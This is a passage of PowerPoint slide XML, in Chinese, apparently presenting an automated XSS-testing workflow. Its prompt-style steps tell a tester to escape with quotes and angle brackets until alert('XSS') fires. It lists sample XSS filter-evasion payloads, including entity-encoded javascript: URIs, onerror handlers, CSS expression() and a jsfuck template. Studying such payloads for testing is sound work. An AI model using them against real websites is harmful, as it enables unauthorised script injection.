                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>如果出现某些方法或者网络请求的报错而非载荷本身的报错，调整请求方法重新进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>工具调用</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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>如果所有载荷均无法测试成功，你需要观察页面请求和响应，尝试添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>等字符进行逃逸</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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你最终必须实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>alert('XSS')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="3990340"/>
            <a:ext cx="3214370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>{"url": "http://xx/page?name={XSS}", "method": "GET", "header": {}, "params": {}, "files": {}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="圆角矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151630" y="4589780"/>
            <a:ext cx="2247265" cy="720090"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4185920" y="4634230"/>
            <a:ext cx="2291080" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>&lt;div onclick="alert('xss')"&gt;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&lt;img src='1' onerror=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'xss'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>)&gt;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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3611880" y="4702175"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="圆角矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="5382895"/>
            <a:ext cx="3214370" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>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文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="5438140"/>
            <a:ext cx="3214370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>Payload [a, b, c, ...] - Response x</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Payload [d, e,  ...] - Response y</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="圆角矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043420" y="3935095"/>
            <a:ext cx="4547235" cy="1838960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="1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7043420" y="3976370"/>
            <a:ext cx="4572635" cy="1767205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;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&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;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&lt;DIV STYLE="width: expression(alert('XSS'));"&gt;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&lt;SCRIPT SRC="data:text/javascript,alert(1)"&gt;&lt;/SCRIPT&gt;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&lt;DIV STYLE="background-image: url(javascript:alert('XSS'))"&gt;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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              </a:rPr>
              <a:t>......</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="图片 35"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625975" y="6168390"/>
            <a:ext cx="360000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="图片 36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095875" y="6174105"/>
            <a:ext cx="360000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="图片 38"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6437925" y="4684055"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="图片 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892550" y="6036945"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9360535" y="5824220"/>
            <a:ext cx="1915160" cy="720090"/>
            <a:chOff x="11144" y="9570"/>
            <a:chExt cx="3016" cy="1134"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="图片 40"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11144" y="9570"/>
              <a:ext cx="1134" cy="1134"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="文本框 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12372" y="9816"/>
              <a:ext cx="1789" cy="580"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>工具</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7047230" y="5973445"/>
            <a:ext cx="2210435" cy="467995"/>
            <a:chOff x="13752" y="9698"/>
            <a:chExt cx="3481" cy="737"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="圆角矩形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13752" y="9698"/>
              <a:ext cx="3281" cy="652"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 22546"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="15000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg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文本框 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13798" y="9789"/>
              <a:ext cx="3435" cy="646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                </a:rPr>
                <a:t>{{jsfuck(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>''</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                </a:rPr>
                <a:t>alert(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>'''</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                  <a:ea typeface="JetBrains Mono"/>
                  <a:cs typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                </a:rPr>
                <a:t>)}} ......</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman Regular" panose="02020503050405090304" charset="0"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="Times New Roman Regular" panose="0202050305040509030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整体</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流程演示</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页面探索</a:t>
            </a:r>
            <a:endPar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 name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="544195" y="1425575"/>
            <a:ext cx="5714365" cy="2349500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7033"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6489700" y="1425575"/>
            <a:ext cx="5392420" cy="4979670"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3436"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="544830" y="3960495"/>
            <a:ext cx="5714365" cy="2460625"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7081"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2880000" flipV="1">
            <a:off x="6193296" y="2902945"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10140000" flipV="1">
            <a:off x="6128526" y="5221965"/>
            <a:ext cx="540000" cy="54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整体</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流程演示</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场景塑造</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8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="314960" y="1363980"/>
            <a:ext cx="5919470" cy="4809490"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3842"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424295" y="1363980"/>
            <a:ext cx="5027930" cy="3252470"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4490"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424295" y="4868545"/>
            <a:ext cx="5027930" cy="1304290"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9883"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
